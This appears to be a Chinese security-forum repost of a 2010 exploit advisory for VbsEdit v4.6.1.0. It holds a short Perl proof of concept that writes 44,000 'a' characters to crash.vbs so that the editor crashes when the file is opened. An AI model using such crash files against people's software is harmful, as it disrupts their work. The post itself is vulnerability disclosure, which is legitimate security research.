首页
社区
课程
招聘
[转帖]VbsEdit v4.6.1.0 Denial of Service
发表于: 2010-8-18 22:31 1791

[转帖]VbsEdit v4.6.1.0 Denial of Service

2010-8-18 22:31
1791
# Exploit Title: VbsEdit v4.6.1.0 DoS  

# Date: 8 / 12 / 2010  

# Author: C G Tan  

# Software Link: http://www.vbsedit.com/tr_download.asp  

# Version: v4.6.1.0 32-bit Version  

# Tested on: Windows XP SP 2, Windows XP SP 3  

# CVE : N / A  

# Description : This is the latest version from the official website.  

   

#!/usr/bin/perl  

   

#Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.  

   

open FILE, ">crash.vbs";  

print FILE 'a'x44000;  

close FILE;

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//